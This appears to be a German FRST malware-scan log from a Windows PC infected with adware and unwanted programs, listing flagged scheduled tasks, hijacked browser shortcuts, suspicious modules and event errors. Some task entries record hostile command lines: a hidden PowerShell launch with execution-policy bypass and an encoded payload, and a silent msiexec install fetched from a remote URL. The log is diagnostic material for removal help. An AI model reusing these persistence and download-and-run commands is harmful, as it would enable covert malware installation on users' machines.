(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

==================== Geplante Aufgaben (Nicht auf der Ausnahmeliste) =============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

Task: {07D082A4-BB0D-42C3-8BB9-5E3E9CD9005F} - System32\Tasks\One System Care Task => C:\Program Files (x86)\OneSystemCare\SystemConsole.exe [2016-12-26] () <==== ACHTUNG
Task: {07D50CCA-2188-43A1-897B-EF2C5815E13F} - System32\Tasks\CCleanerSkipUAC => C:\Program Files\CCleaner\CCleaner.exe [2016-08-26] (Piriform Ltd)
Task: {08BC7C06-525E-43F2-B72E-DDCD9E7C4DD6} - System32\Tasks\Microsoft\Windows\Media Center\RecordingRestart => %SystemRoot%\ehome\ehrec.exe
Task: {0CD166F7-D57D-4AB4-8CE2-07FD0953AD42} - System32\Tasks\SystemHealer Run Delay => C:\Program Files (x86)\SystemHealer\SystemHealer.exe [2016-12-26] () <==== ACHTUNG
Task: {1A3181DF-833E-436D-A30C-248F034B8623} - System32\Tasks\NvTmRep_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvTmRep.exe [2017-01-20] (NVIDIA Corporation)
Task: {1EA42CBF-EADD-4B00-81ED-2C40E4238B7C} - System32\Tasks\NvTmMon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvTmMon.exe [2017-01-20] (NVIDIA Corporation)
Task: {3024B4B3-FD37-477F-BA7A-04E9D557A0DF} - System32\Tasks\Microsoft\Windows\Media Center\SqlLiteRecoveryTask => %SystemRoot%\ehome\mcupdate.exe
Task: {338C4099-111D-4274-9855-DC0ACCC34B35} - System32\Tasks\HDWallPaper => C:\Program Files (x86)\HDWallPaper\HDWallPaper.exe [2016-11-02] (HDWallPaper) <==== ACHTUNG
Task: {358E9F01-B54F-4F1A-A590-566825F4CCF6} - System32\Tasks\Microsoft\Windows\Media Center\PBDADiscovery => %SystemRoot%\ehome\ehPrivJob.exe
Task: {3782FA31-E821-4B7B-9FD3-1FC42377DBD5} - System32\Tasks\Microsoft\Windows\Media Center\InstallPlayReady => %SystemRoot%\ehome\ehPrivJob.exe
Task: {3A539CDD-D9FE-4485-BB5E-F119374C2E2B} - System32\Tasks\NvProfileUpdaterDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\Update Core\NvProfileUpdater64.exe [2017-01-20] (NVIDIA Corporation)
Task: {3B7398CA-6B98-47E4-BFFB-FB8AEB3C62F8} - System32\Tasks\Microsoft\Windows\Media Center\DispatchRecoveryTasks => %SystemRoot%\ehome\ehPrivJob.exe
Task: {438725D4-69D8-4445-B2DA-9A70D2F233ED} - System32\Tasks\PC Clean Plus_DEFAULT => C:\Program Files (x86)\PC Clean Plus\PCCleanPlus.exe [2017-01-05] (PC Clean Plus) <==== ACHTUNG
Task: {535076EF-9CD5-46BA-A7C8-10EEDDA703A2} - System32\Tasks\NvProfileUpdaterOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\Update Core\NvProfileUpdater64.exe [2017-01-20] (NVIDIA Corporation)
Task: {595ED7A0-ED76-4B70-9B39-AA80B04DC0D1} - System32\Tasks\Microsoft\Windows\Media Center\RegisterSearch => %SystemRoot%\ehome\ehPrivJob.exe
Task: {5D60C962-36C5-4A56-A06A-6FD1172E85A4} - System32\Tasks\One System Care Monitor => C:\Program Files (x86)\OneSystemCare\CleanupConsole.exe [2016-12-26] () <==== ACHTUNG
Task: {60FA74FF-6279-4ECD-9EA9-5DE73A58257E} - System32\Tasks\Microsoft\Windows\Media Center\mcupdate_scheduled => %SystemRoot%\ehome\mcupdate.exe
Task: {71C58D38-8A13-46DD-8D3E-D7EDF04F9F41} - System32\Tasks\Microsoft\Windows\Media Center\PBDADiscoveryW1 => %SystemRoot%\ehome\ehPrivJob.exe
Task: {74E7882B-EC43-4B32-87E6-E11EFB4D4BAA} - System32\Tasks\Microsoft\Windows\Media Center\OCURDiscovery => %SystemRoot%\ehome\ehPrivJob.exe
Task: {7AD619ED-FDE2-44B2-B257-1E4E9D88D80E} - System32\Tasks\RunAtStartup => C:\Users\Barbara\AppData\Roaming\Event Monitor\em.exe [2017-01-05] () <==== ACHTUNG
Task: {81E58287-3D1D-4B96-8E11-D031A50025F6} - System32\Tasks\SystemHealer Monitor => C:\Program Files (x86)\SystemHealer\HealerConsole.exe [2016-12-26] () <==== ACHTUNG
Task: {82C50AED-8035-414F-9332-DE47AED14F1A} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2016-12-19] (Adobe Systems Incorporated)
Task: {8621A79A-23F3-402E-B829-1B3C08FC23C6} - System32\Tasks\Microsoft\Windows\Media Center\ActivateWindowsSearch => %SystemRoot%\ehome\ehPrivJob.exe
Task: {8AE506E1-EC61-4874-B4FD-1DACFAEF47EE} - System32\Tasks\SMW_P => C:\ProgramData\smp2.exe [2017-02-12] () <==== ACHTUNG
Task: {8FEDA5A7-F6AE-459A-895E-3269F9B87DC5} - System32\Tasks\108l42A89c7603 => Rundll32.exe "C:\ProgramData\108l42A89c7603\108l42A89c7603.dll",lAcqxFh <==== ACHTUNG
Task: {917F73AC-B595-428F-9D7E-804DD4CA0B19} - System32\Tasks\OneDrive Standalone Update Task => C:\Users\Barbara\AppData\Local\Microsoft\OneDrive\17.3.6517.0809\OneDriveStandaloneUpdater.exe
Task: {931E12E2-BA73-4859-AF12-777A31166AB5} - System32\Tasks\NvNodeLauncher_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\NvNode\nvnodejslauncher.exe [2017-01-20] (NVIDIA Corporation)
Task: {94874025-16A1-42F6-BF7D-4DDF56156E6C} - System32\Tasks\PC Clean Plus_UPDATES => C:\Program Files (x86)\PC Clean Plus\PCCleanPlus.exe [2017-01-05] (PC Clean Plus) <==== ACHTUNG
Task: {981171F7-EB47-47C7-9E26-7F1DE33B4C5E} - System32\Tasks\Microsoft\Windows\Media Center\UpdateRecordPath => %SystemRoot%\ehome\ehPrivJob.exe
Task: {9AF8C6A8-27BD-459C-A0B6-149FCF640506} - System32\Tasks\NvDriverUpdateCheckDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe [2017-01-20] (NVIDIA Corporation)
Task: {A23D98E2-25C7-4A4E-A93A-5277AAE5D6BD} - System32\Tasks\Microsoft\Windows\Media Center\PvrScheduleTask => %SystemRoot%\ehome\mcupdate.exe
Task: {A9DC2516-E3BE-4B34-AE6A-49DECD192D48} - System32\Tasks\Microsoft\Windows\Media Center\OCURActivate => %SystemRoot%\ehome\ehPrivJob.exe
Task: {ABD44F90-CD20-4C95-AA96-464B6AEE71FE} - System32\Tasks\Microsoft\Windows\Media Center\ReindexSearchRoot => %SystemRoot%\ehome\ehPrivJob.exe
Task: {AED5C637-95A0-4DD0-ADC7-A4808E2FACE9} - System32\Tasks\Microsoft\Windows\Media Center\PeriodicScanRetry => %windir%\ehome\MCUpdate.exe
Task: {B3737810-7B5B-49FA-ABF7-D2566CB7161D} - System32\Tasks\Microsoft\Windows\Media Center\PBDADiscoveryW2 => %SystemRoot%\ehome\ehPrivJob.exe
Task: {B73E6B94-97F6-4185-B265-5AF584ADD7C2} - System32\Tasks\Microsoft\Windows\Media Center\ObjectStoreRecoveryTask => %SystemRoot%\ehome\mcupdate.exe
Task: {B8A37631-3077-4955-BA7D-5E165F4C4DB5} - System32\Tasks\Microsoft\Windows\Media Center\ehDRMInit => %SystemRoot%\ehome\ehPrivJob.exe
Task: {BF709A57-E750-4DDD-B582-32B6C514637F} - System32\Tasks\{7D0D0E47-797A-7F7A-7D11-7D797E041105} => powershell.exe -nologo -executionpolicy bypass -noninteractive -windowstyle hidden -EncodedCommand OwAgACAAOwAgADsAOwAgACAAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQA9ACIAcwB0AG8AcAAiADsAJABzAGMAPQAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AG kAbgB1AGUAIgA7ACQAVwBhAHIAbgBpAG4AZwBQAHIAZQBmAGUAcgBlAG4AYwBlAD0A (Der Dateneintrag hat 10008 mehr Zeichen). <==== ACHTUNG
Task: {C0F5AE71-6716-4F6C-ADC4-059DF01B35BA} - System32\Tasks\Microsoft\Windows\Media Center\StartRecording => %SystemRoot%\ehome\ehrec.exe
Task: {C1B4B136-C33D-4401-AED3-81D2C9151669} - System32\Tasks\Microsoft\Windows\Media Center\PvrRecoveryTask => %SystemRoot%\ehome\mcupdate.exe
Task: {C66406B3-BC53-4127-ACE4-04BF99EB50C5} - System32\Tasks\System Healer Task => C:\Program Files (x86)\SystemHealer\RescueMonitor.exe [2016-12-26] () <==== ACHTUNG
Task: {CE9FBA87-1B2B-4985-9994-F3FC89A66F04} - System32\Tasks\PC Clean Plus => C:\Program Files (x86)\PC Clean Plus\PCCleanPlus.exe [2017-01-05] (PC Clean Plus) <==== ACHTUNG
Task: {CF59DDC9-64FA-4592-BA4C-996DE144E956} - System32\Tasks\NvTmRepOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvTmRep.exe [2017-01-20] (NVIDIA Corporation)
Task: {D15D9A6F-7B7C-46FF-B72E-989CE158ACF1} - System32\Tasks\Microsoft\Windows\Media Center\MediaCenterRecoveryTask => %SystemRoot%\ehome\mcupdate.exe
Task: {D20E72EA-E1B2-4FCA-90F2-94F73460A59C} - System32\Tasks\Microsoft\Windows\Media Center\mcupdate => %SystemRoot%\ehome\mcupdate.exe
Task: {E3BEDC84-1FC4-462C-B3DA-C04B65228E1C} - System32\Tasks\Pregehabering => msiexec /i hxxp://d2buh1bf1g584w.cloudfront.net/msi/rel.php?u=SamsungXSSDX840XEVOX250GB_S1DBNSBF263398Y&v=2017212 /q
Task: {ED9678EB-B078-4A94-A29D-89D8596AB858} - System32\Tasks\Atikationbogot System => C:\Program Files (x86)\Plidaing\drerzes.exe [2017-02-12] (Glarysoft Ltd)
Task: {EF1F752D-CA59-470C-BB1B-D66C885E54E5} - System32\Tasks\Microsoft\Windows\Media Center\ConfigureInternetTimeService => %SystemRoot%\ehome\ehPrivJob.exe
Task: {F39C9638-2646-42EF-8938-336B0252CBDD} - System32\Tasks\EhXuia58iw => C:\Program Files (x86)\vpF0TnTYqt\updengine.exe [2017-02-11] () <==== ACHTUNG
Task: {FC3AC33B-0D31-463D-92B3-AE425ADE0BA4} - System32\Tasks\SMW_UpdateTask_Time_323832303833353732332d374a55414134502a576c4a5a => Wscript.exe //B "C:\ProgramData\SearchModule\smhe.js" smu.exe /invoke /f:check_services /l:0 <==== ACHTUNG

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Aufgabe verschoben. Die Datei, die durch die Aufgabe gestartet wird, wird nicht verschoben.)

Task: C:\WINDOWS\Tasks\PC Clean Plus_DEFAULT.job => C:\Program Files (x86)\PC Clean Plus\PCCleanPlus.exe <==== ACHTUNG
Task: C:\WINDOWS\Tasks\PC Clean Plus_UPDATES.job => C:\Program Files (x86)\PC Clean Plus\PCCleanPlus.exe <==== ACHTUNG

==================== Verknüpfungen =============================

(Die Einträge können gelistet werden, um sie zurückzusetzen oder zu entfernen.)

Shortcut: C:\Users\Barbara\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Intеrnеt Ехplоrеr.lnk -> C:\Program Files (x86)\Internet Explorer\iexplore.bat ()
Shortcut: C:\Users\Barbara\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Lаunсh Intеrnеt Ехplоrеr Вrоwsеr.lnk -> C:\Program Files (x86)\Internet Explorer\iexplore.bat ()
Shortcut: C:\Users\Barbara\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Моzillа Firеfох.lnk -> C:\Program Files (x86)\Mozilla Firefox\firefox.bat ()
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Моzillа Firеfох.lnk -> C:\Program Files (x86)\Mozilla Firefox\firefox.bat ()

ShortcutWithArgument: C:\Users\Barbara\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Microsoft Edge.lnk -> C:\Windows\explorer.exe (Microsoft Corporation) -> "microsoft-edge:hxxp://www%2dsearching.com/?prd=set_epe&s=H2Czbcnbl1AU,e757b544-b7e3-4f69-a055-fbd9a7e08b83,"
ShortcutWithArgument: C:\Users\Barbara\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Search.lnk -> C:\program files\internet explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www%2dsearching.com/?prd=set_epe&s=H2Czbcnbl1AU,e757b544-b7e3-4f69-a055-fbd9a7e08b83,

==================== Geladene Module (Nicht auf der Ausnahmeliste) ==============

2017-02-12 22:13 - 2014-03-22 12:34 - 02997760 _____ () C:\ProgramData\108l42A89c7603\108l42A89c7603.dll
2017-02-12 22:13 - 2017-02-12 22:13 - 00316928 _____ () C:\Program Files (x86)\Atikationbogot System\local64spl.dll
2017-02-12 22:14 - 2017-02-12 22:07 - 03786752 _____ () C:\ProgramData\Logic Handler\set.exe
2017-02-12 22:13 - 2017-02-12 22:13 - 00230400 _____ () C:\Program Files (x86)\da002918-daba-4445-a323-cc3eefdf9d091486934027\protda002918-daba-4445-a323-cc3eefdf9d09.tmpfs
2017-02-12 22:14 - 2017-02-12 22:14 - 00470592 _____ () C:\WINDOWS\SysWoW64\NetUtils2016.exe
2017-02-12 22:13 - 2017-02-12 23:06 - 00043520 _____ () C:\ProgramData\NetworkPacketManitor\Nettrans.exe
2016-10-13 07:34 - 2017-01-20 19:39 - 04489152 _____ () C:\Program Files\NVIDIA Corporation\NvContainer\Poco.dll
2016-10-13 07:34 - 2017-01-20 19:39 - 01147328 _____ () C:\Program Files\NVIDIA Corporation\NvContainer\libprotobuf.dll
2017-02-12 22:15 - 2017-02-12 22:14 - 00983040 _____ () C:\ProgramData\Zaamla\Zaamla.exe
2017-02-12 22:14 - 2017-02-13 19:05 - 00625272 _____ () C:\Windows\System32\NetUtils2016.dll
2016-07-16 12:42 - 2016-07-16 12:42 - 00231424 _____ () C:\WINDOWS\SYSTEM32\ism32k.dll
2016-12-16 16:18 - 2016-12-09 11:29 - 02681200 _____ () C:\WINDOWS\System32\CoreUIComponents.dll
2016-09-23 02:40 - 2016-12-29 13:44 - 00134712 _____ () C:\Program Files\NVIDIA Corporation\Display\NvSmartMax64.dll
2016-12-16 16:18 - 2016-12-09 11:29 - 02681200 _____ () C:\WINDOWS\system32\CoreUIComponents.dll
2016-12-26 10:35 - 2016-12-26 10:35 - 02238656 _____ () C:\Program Files (x86)\OneSystemCare\CleanupConsole.exe
2016-12-26 11:19 - 2016-12-26 11:19 - 01582240 _____ () C:\Program Files (x86)\SystemHealer\HealerConsole.exe
2016-12-16 16:18 - 2016-12-09 11:29 - 02681200 _____ () C:\WINDOWS\SYSTEM32\CoreUIComponents.dll
2017-02-12 22:14 - 2017-02-12 22:15 - 00248320 _____ () C:\Users\Barbara\AppData\Local\Temp\gCEF9.tmp.exe
2016-09-23 03:38 - 2016-09-23 03:38 - 00134656 _____ () C:\Windows\ShellExperiences\Windows.UI.Shell.SharedUtilities.dll
2017-01-10 21:04 - 2016-12-21 08:09 - 00474112 _____ () C:\Windows\ShellExperiences\QuickActions.dll
2017-01-10 20:59 - 2016-12-21 07:54 - 09760768 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\CortanaApi.dll
2017-01-10 20:59 - 2016-12-21 07:48 - 01401856 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Core.dll
2017-01-10 20:59 - 2016-12-21 07:48 - 00757248 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\CSGSuggestLib.dll
2017-01-10 20:59 - 2016-12-21 07:48 - 01033216 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Actions.dll
2017-01-10 20:59 - 2016-12-21 07:48 - 02424320 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.BackgroundTask.dll
2017-01-10 20:59 - 2016-12-21 07:53 - 04853760 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\RemindersUI.dll
2017-02-12 22:14 - 2017-01-05 18:45 - 03292608 _____ () C:\Users\Barbara\AppData\Roaming\Event Monitor\em.exe
2017-01-10 20:59 - 2016-12-21 07:47 - 00114176 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Dss.BackgroundTask.dll
2016-08-26 19:25 - 2016-08-26 19:25 - 00061440 _____ () C:\Program Files\CCleaner\lang\lang-1031.dll
2016-09-29 08:07 - 2016-09-29 08:07 - 47824832 _____ () C:\Users\Barbara\AppData\Roaming\AppTrailers\AppTrailers.exe
2017-02-11 11:46 - 2017-02-11 11:46 - 01107456 _____ () C:\Program Files (x86)\vpF0TnTYqt\kl.dll
2016-10-22 12:18 - 2016-10-22 12:18 - 02493440 _____ () C:\Program Files (x86)\Origin\libGLESv2.dll
2016-10-13 07:34 - 2017-01-20 19:39 - 00018880 _____ () C:\Program Files (x86)\NVIDIA Corporation\Update Core\detoured.dll
2016-10-13 07:34 - 2017-01-20 19:39 - 03774400 _____ () C:\Program Files (x86)\NVIDIA Corporation\NvContainer\Poco.dll
2016-10-13 07:34 - 2017-01-20 19:39 - 00900032 _____ () C:\Program Files (x86)\NVIDIA Corporation\NvContainer\libprotobuf.dll
2016-10-13 07:34 - 2017-01-20 19:38 - 64245184 _____ () C:\Program Files (x86)\NVIDIA Corporation\NVIDIA GeForce Experience\libcef.dll
2016-10-13 07:34 - 2017-01-20 14:36 - 00338488 _____ () \\?\C:\Program Files (x86)\NVIDIA Corporation\NvNode\NVAccountAPINode.node
2016-10-13 07:34 - 2017-01-20 14:36 - 00254008 _____ () \\?\C:\Program Files (x86)\NVIDIA Corporation\NvNode\DriverInstall.node
2016-10-13 07:34 - 2017-01-20 14:36 - 02808888 _____ () \\?\C:\Program Files (x86)\NVIDIA Corporation\NvNode\Downloader.node
2016-10-13 07:34 - 2017-01-20 14:36 - 00384568 _____ () \\?\C:\Program Files (x86)\NVIDIA Corporation\NvNode\NvGameShareAPINode.node
2016-10-13 07:34 - 2017-01-20 14:36 - 00537656 _____ () \\?\C:\Program Files (x86)\NVIDIA Corporation\NvNode\NvSpCapsAPINode.node
2016-10-13 07:34 - 2017-01-20 14:36 - 00468024 _____ () \\?\C:\Program Files (x86)\NVIDIA Corporation\NvNode\NvGalleryAPINode.node
2016-10-13 07:34 - 2017-01-20 14:36 - 01066552 _____ () \\?\C:\Program Files (x86)\NVIDIA Corporation\NvNode\NvCameraAPINode.node
2017-02-03 17:12 - 2017-01-20 14:36 - 01014840 _____ () \\?\C:\Program Files (x86)\NVIDIA Corporation\NvNode\NvSDKAPINode.node

==================== Alternate Data Streams (Nicht auf der Ausnahmeliste) =========

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird nur der ADS entfernt.)

AlternateDataStreams: C:\ProgramData\Reprise:wupeogjxldtlfudivq`qsp`27hfm [0]

==================== Abgesicherter Modus (Nicht auf der Ausnahmeliste) ===================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Der Wert "AlternateShell" wird wiederhergestellt.)

==================== Verknüpfungen (Nicht auf der Ausnahmeliste) ===============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Registryeintrag auf den Standardwert zurückgesetzt oder entfernt.)

==================== Internet Explorer Vertrauenswürdig/Eingeschränkt ===============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt.)

==================== Hosts Inhalt: ===============================

(Wenn benötigt kann der Hosts: Schalter in die Fixlist aufgenommen werden um die Hosts Datei zurückzusetzen.)

2009-07-14 03:34 - 2017-02-12 22:14 - 00000833 ____A C:\WINDOWS\system32\Drivers\etc\hosts

==================== Andere Bereiche ============================

(Aktuell gibt es keinen automatisierten Fix für diesen Bereich.)

HKU\S-1-5-21-1500252791-3377746768-789393517-1000\Control Panel\Desktop\\Wallpaper -> C:\Users\Barbara\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper
DNS Servers: Datenträger ist nicht mit dem Internet verbunden.
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
Windows Firewall ist aktiviert.

==================== MSCONFIG/TASK MANAGER Deaktivierte Einträge ==

HKLM\...\StartupApproved\Run: => "gplyra"
HKLM\...\StartupApproved\Run32: => "MyMemory"
HKU\S-1-5-21-1500252791-3377746768-789393517-1000\...\StartupApproved\Run: => "Spotify"
HKU\S-1-5-21-1500252791-3377746768-789393517-1000\...\StartupApproved\Run: => "Steam"
HKU\S-1-5-21-1500252791-3377746768-789393517-1000\...\StartupApproved\Run: => "x5o3Yv2CQw.exe"
HKU\S-1-5-21-1500252791-3377746768-789393517-1000\...\StartupApproved\Run: => "zC6b23GTAV.exe"
HKU\S-1-5-21-1500252791-3377746768-789393517-1000\...\StartupApproved\Run: => "GWH9N93A6U"
HKU\S-1-5-21-1500252791-3377746768-789393517-1000\...\StartupApproved\Run: => "JLAWFPN14I"
HKU\S-1-5-21-1500252791-3377746768-789393517-1000\...\StartupApproved\Run: => "XN55R0BYZD"
HKU\S-1-5-21-1500252791-3377746768-789393517-1000\...\StartupApproved\Run: => "LAMMPX75X6"
HKU\S-1-5-21-1500252791-3377746768-789393517-1000\...\StartupApproved\Run: => "JG5BHCSAVC"

==================== Firewall Regeln (Nicht auf der Ausnahmeliste) ===============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

FirewallRules: [vm-monitoring-nb-session] => LPort=139
FirewallRules: [MSMQ-In-TCP] => %systemroot%\system32\mqsvc.exe
FirewallRules: [MSMQ-Out-TCP] => %systemroot%\system32\mqsvc.exe
FirewallRules: [MSMQ-In-UDP] => %systemroot%\system32\mqsvc.exe
FirewallRules: [MSMQ-Out-UDP] => %systemroot%\system32\mqsvc.exe
FirewallRules: [WCF-NetTcpActivator-In-TCP-64bit] => LPort=808
FirewallRules: [UDP Query User{89490B79-F7C4-449C-AEA9-7C67ECB9FB5B}D:\program files (x86)\the witcher 2\bin\witcher2.exe] => D:\program files (x86)\the witcher 2\bin\witcher2.exe
FirewallRules: [TCP Query User{4A234969-EDBC-4530-B847-6329B46AA77A}D:\program files (x86)\the witcher 2\bin\witcher2.exe] => D:\program files (x86)\the witcher 2\bin\witcher2.exe
FirewallRules: [UDP Query User{F111BCF2-9CBB-4742-9CFC-D23879181430}D:\program files (x86)\the witcher 2\bin\witcher2.exe] => D:\program files (x86)\the witcher 2\bin\witcher2.exe
FirewallRules: [TCP Query User{3DC38285-63C7-451A-AE42-5DB7E25FE3FB}D:\program files (x86)\the witcher 2\bin\witcher2.exe] => D:\program files (x86)\the witcher 2\bin\witcher2.exe
FirewallRules: [{C681929D-CAC5-43C1-8926-0E72B114FE4B}] => C:\Program Files (x86)\Steam\bin\steamwebhelper.exe
FirewallRules: [{51B20E6F-4269-4C1F-BCCF-4AE409514E34}] => C:\Program Files (x86)\Steam\bin\steamwebhelper.exe
FirewallRules: [{1EFF0FAC-0E9E-4E91-809B-2BBDDEF8994B}] => C:\Program Files (x86)\Steam\Steam.exe
FirewallRules: [{51F45EC0-BB2A-4881-81A4-39592A9F1F50}] => C:\Program Files (x86)\Steam\Steam.exe
FirewallRules: [UDP Query User{592ABD94-223B-4029-ADAD-C4B4FCB9D173}C:\users\barbara\appdata\roaming\spotify\spotify.exe] => C:\users\barbara\appdata\roaming\spotify\spotify.exe
FirewallRules: [TCP Query User{E1123DD8-DF30-4BAF-95D0-0CD324E434C5}C:\users\barbara\appdata\roaming\spotify\spotify.exe] => C:\users\barbara\appdata\roaming\spotify\spotify.exe
FirewallRules: [{E755C63D-D036-4730-806E-F025F68F5F83}] => C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{EA936888-D98A-4A6D-8DD0-3AD3C9E0A3BE}] => C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [TCP Query User{B23562F6-99F7-40EB-85CA-F7BC0A871F26}C:\users\barbara\appdata\roaming\spotify\spotify.exe] => C:\users\barbara\appdata\roaming\spotify\spotify.exe
FirewallRules: [UDP Query User{B9E938BA-EF39-4E7E-85AB-3E80B71AFF38}C:\users\barbara\appdata\roaming\spotify\spotify.exe] => C:\users\barbara\appdata\roaming\spotify\spotify.exe
FirewallRules: [{DC1A5F54-BD72-48BE-9E47-2743168046A0}] => C:\Program Files\NVIDIA Corporation\NvContainer\NvContainer.exe
FirewallRules: [{552C0333-744D-467D-9BBA-8B77D85239E4}] => C:\Program Files\NVIDIA Corporation\NvContainer\NvContainer.exe
FirewallRules: [{D8E7A1C6-22AF-42A9-8E8C-58F55E9CE22C}] => C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamUserAgent.exe
FirewallRules: [{E0D9EE58-C0E4-48F0-BDC9-947A2AB5CA23}] => C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe
FirewallRules: [{4ED0602B-CF04-4814-BAC6-89B59E81BAAC}] => C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe
FirewallRules: [{9D55ECBB-5F7C-4C93-8581-D680E589C6CE}] => C:\WINDOWS\system32\rundll32.exe
FirewallRules: [{4924DF91-5443-4BAE-9BEC-15B57C9999A8}] => C:\Windows\System32\rundll32.exe
FirewallRules: [{A59BD35A-44A3-4F57-9F0B-5AA14A9BACC0}] => C:\Windows\System32\rundll32.exe
FirewallRules: [{91FB1473-E8E8-4DCA-A666-B383F1335F45}] => C:\Windows\System32\rundll32.exe
FirewallRules: [{D5FD6AE9-1750-4861-93D9-3775F082B4E5}] => C:\Windows\System32\rundll32.exe
DomainProfile\AuthorizedApplications: [C:\Program Files\ARCHline 2015\\ARCHlineXP2015.exe] => C:\Program Files\ARCHline 2015\ARCHlineXP2015.exe:*:Enabled:ARCHline.XP 2015
DomainProfile\AuthorizedApplications: [C:\Program Files\ARCHline 2015\\ARCHlineXP2015.bin] => C:\Program Files\ARCHline 2015\ARCHlineXP2015.bin:*:Enabled:ARCHline.XP 2015
StandardProfile\AuthorizedApplications: [C:\Program Files\ARCHline 2015\\ARCHlineXP2015.exe] => C:\Program Files\ARCHline 2015\ARCHlineXP2015.exe:*:Enabled:ARCHline.XP 2015
StandardProfile\AuthorizedApplications: [C:\Program Files\ARCHline 2015\\ARCHlineXP2015.bin] => C:\Program Files\ARCHline 2015\ARCHlineXP2015.bin:*:Enabled:ARCHline.XP 2015

==================== Wiederherstellungspunkte =========================

25-01-2017 13:43:30 Windows Update
03-02-2017 17:33:02 Geplanter Prüfpunkt
09-02-2017 13:37:47 Windows Update

==================== Fehlerhafte Geräte im Gerätemanager =============

==================== Fehlereinträge in der Ereignisanzeige: =========================

Applikationsfehler:
==================
Error: (02/12/2017 10:27:20 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: Programm PCCleanPlus.exe, Version 3.6.81.400 kann nicht mehr unter Windows ausgeführt werden und wurde beendet. Überprüfen Sie den Problemverlauf in der Systemsteuerung "Sicherheit und Wartung", um nach weiteren Informationen zum Problem zu suchen.

Prozess-ID: 474

Startzeit: 01d28576773e58a4

Beendigungszeit: 4294967295

Anwendungspfad: C:\Program Files (x86)\PC Clean Plus\PCCleanPlus.exe

Berichts-ID: 082a8569-f16a-11e6-b566-7824af3a6ca1

Vollständiger Name des fehlerhaften Pakets:

Auf das fehlerhafte Paket bezogene Anwendungs-ID:

Error: (02/12/2017 10:25:53 PM) (Source: Perflib) (EventID: 1008) (User: )
Description: Die Open-Prozedur für den Dienst "BITS" in der DLL "C:\Windows\System32\bitsperf.dll" war nicht erfolgreich. Die Leistungsdaten für diesen Dienst sind nicht verfügbar. Die ersten vier Bytes (DWORD) des Datenbereichs enthalten den Fehlercode.

Error: (02/12/2017 10:25:36 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: Programm CleanupConsole.exe, Version 0.0.0.0 kann nicht mehr unter Windows ausgeführt werden und wurde beendet. Überprüfen Sie den Problemverlauf in der Systemsteuerung "Sicherheit und Wartung", um nach weiteren Informationen zum Problem zu suchen.

Prozess-ID: 165c

Startzeit: 01d2857673fc6ed1

Beendigungszeit: 4294967295

Anwendungspfad: C:\Program Files (x86)\OneSystemCare\CleanupConsole.exe

Berichts-ID: ca6acfd5-f169-11e6-b566-7824af3a6ca1

Vollständiger Name des fehlerhaften Pakets:

Auf das fehlerhafte Paket bezogene Anwendungs-ID:

Error: (02/12/2017 10:25:34 PM) (Source: Application Hang) (EventID: 1002) (User: )
